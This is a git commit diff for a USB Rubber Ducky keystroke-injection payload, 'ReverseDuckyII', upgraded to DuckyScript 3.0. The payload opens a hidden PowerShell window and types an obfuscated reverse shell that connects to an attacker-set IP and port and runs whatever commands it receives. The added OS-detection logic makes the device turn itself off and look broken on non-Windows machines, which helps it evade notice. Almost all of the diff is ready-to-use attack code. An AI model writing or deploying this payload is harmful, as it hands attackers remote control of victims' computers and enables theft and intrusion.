Updated ReverseDucky2 to version 2
- Added DuckyScript 3.0 usage - Inserting into non Windows machines, the Ducky won't execute the payload and will appear brokenpull/183/head
parent
5294cc938b
commit
630392c69d
|
@ -1,27 +1,72 @@
|
|||
REM ReverseDucky2
|
||||
REM Version 1.3
|
||||
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
|
||||
REM ReverseDuckyII
|
||||
REM Version 2.0
|
||||
REM OS: Windows / Multi
|
||||
REM Author: 0iphor13
|
||||
REM Requirement: DuckyScript 3.0
|
||||
|
||||
REM Reverse shell executed in the background
|
||||
REM Fill in Attacker-IP and Port in Line 19
|
||||
REM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.
|
||||
REM If inserted into a non Windows machine, the Ducky will appear broken.
|
||||
REM DON'T FORGET TO START LISTENER
|
||||
|
||||
REM PASSIVE_WINDOWS_DETECT extension, made by Korben, to indentify the OS
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.0
|
||||
|
||||
REM Windows fully passive OS Detection and passive Detect Ready
|
||||
REM Includes its own passive detect ready. Does not require
|
||||
REM additional extensions
|
||||
|
||||
REM USAGE:
|
||||
REM Extension runs inline (here)
|
||||
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
REM boot delay
|
||||
REM $_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE MAX_WAIT 150
|
||||
DEFINE CHECK_INTERVAL 20
|
||||
DEFINE WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE NOT_WINDOWS 7
|
||||
|
||||
VAR $MAX_TRIES = MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
ELSE
|
||||
$_OS = NOT_WINDOWS
|
||||
END_IF
|
||||
|
||||
REM EXAMPLE USAGE AFTER EXTENSION
|
||||
REM IF ($_OS == WINDOWS) THEN
|
||||
REM STRING HELLO WINDOWS!
|
||||
REM ELSE
|
||||
REM STRING HELLO WORLD!
|
||||
REM END_IF
|
||||
END_EXTENSION
|
||||
|
||||
REM Configure your settings below:
|
||||
REM Insert the attacking IP between '' & define your port
|
||||
DEFINE ATTACKER '192.168.178.25'
|
||||
DEFINE PORT 4444
|
||||
REM Set the default DELAY
|
||||
DEFINE WAIT 500
|
||||
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
DELAY 1500
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -NoP -NonI -W hidden
|
||||
DELAY 250
|
||||
ENTER
|
||||
|
||||
DELAY 200
|
||||
STRING $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt("ATTACKER-IP",PORT);$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$s
|
||||
DELAY 100
|
||||
STRING .REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oUt
|
||||
DELAY 100
|
||||
STRING -STriNG);$x=$z+"PS "+(pwd)+"> ";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE()
|
||||
DELAY 100
|
||||
ENTER
|
||||
DELAY WAIT
|
||||
STRINGLN powershell -NoP -NonI -w h
|
||||
DELAY WAIT
|
||||
STRINGLN $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt( ATTACKER , PORT );$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$s.REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oUt-STriNG);$x=$z+"Ducky@PS "+(pwd)+"> ";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE();exit
|
||||
REM Capslock light will indicate a finished payload
|
||||
CAPSLOCK
|
||||
ELSE
|
||||
DELAY WAIT
|
||||
REM Inserting the Ducky into a non Windows machine will result in ATTACKMODE OFF
|
||||
ATTACKMODE OFF
|
||||
END_IF
|
||||
|
||||
|
||||
|
|
Loading…
Reference in New Issue